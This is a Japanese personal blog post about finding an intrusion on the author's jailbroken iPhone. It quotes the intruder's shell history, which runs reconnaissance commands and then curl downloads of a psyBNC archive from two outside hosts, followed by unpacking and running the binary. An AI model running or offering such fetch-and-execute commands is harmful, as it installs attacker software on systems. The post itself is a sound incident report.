NokiaのE90に関連した備忘録です。いつまで続くかな?
上記の広告は1ヶ月以上更新のないブログに表示されています。
新しい記事を書く事で広告が消せます。
-----追記ここから-----
【2010/05/23】 以下の記事をアップしました。

iPhoneの脱獄について

本当に脱獄が必要なのか良く考えた上で自己責任で実行してください。
-----追記ここまで-----

昨日Calendarのデータをいじろうと久しぶりにiPhoneにログインしたところ/var/rootの下に .a なるディレクトリーが作成されていました。
.で始まるファイル名なのでlsコマンドでも-aを付けないと表示されないのですが、普段から-laを付けているので見つけることが出来ました。

で、ディレクトリーの中を見るとpsydarwin.tgzと言うファイルとそれを展開した物が入っていました。
こんなディレクトリーを作った覚えも全くないのでおかしいと思い.bash_historyを見てみるとこんなコマンドが実行されていました。

uname -a
cat /etc/hosts
w
uptime
ps -x
mkdir .a
cd .a
curl -O http://trades.at.ua/psybnc-darwin.tgz
wget
curl
curl -O http://Linux-Help.clan.su/download/PsyBncDRWN.tgz
yum istall wget
tar zxvf psydarwin.tgz
cd psybnc
chmod +x *
sh
./psybnc
./psybnc
ls
./psybnc
chmod +x *
./psybnc


mkdir .a が実行されているのでディレクトリーのタイムスタンプを見ると12/31の23:59となっており、この時間はTVを見ていたのでiPhoneには指一本触れていませんでした。

curlなど普段は全く使わないというか、使ったことが一度もないコマンドなので誰かに触られたとしか考えられません。
rootのパスワードは変更してあるし、誰がどうやって侵入したのか全くの謎です。

これら一連のコマンドの後は見覚えのあるコマンドなので、途中であきらめたのでしょう。
実行しようとしたバイナリーはARM用にコンパイルされた物ではなかったので助かりました。

それにしても年明け早々???な出来事でした。
スポンサーサイト
コメント
この記事へのコメント
nao様

iphone.goodegg.jpのgoodeggと申します。
事後報告で恐れ入りますが当ブログ記事にて紹介させて頂きました。

この様な”生の事例”はとてもインパクトがありました!貴重な事例のご紹介ありがとう御座います。


2009/01/22(木) 22:51 | URL | goodegg #-[ 編集]
コメントを投稿する
URL:
Comment:
Pass:
秘密: 管理者にだけ表示を許可する
 
トラックバック
この記事のトラックバックURL
http://hnaokixyz.blog109.fc2.com/tb.php/71-5609b96d
この記事にトラックバックする(FC2ブログユーザー)
この記事へのトラックバック
iPhoneに侵入された??? - Today’s E90 常に危険にさらされているみたい - Today’s E90 においてJailBreakenなiPhoneに侵入された事例が紹介されています。 ? 無駄に不...
2009/01/22(木) 09:10:49 | iPhone.goodegg.jp
上記広告は1ヶ月以上更新のないブログに表示されています。新しい記事を書くことで広告を消せます。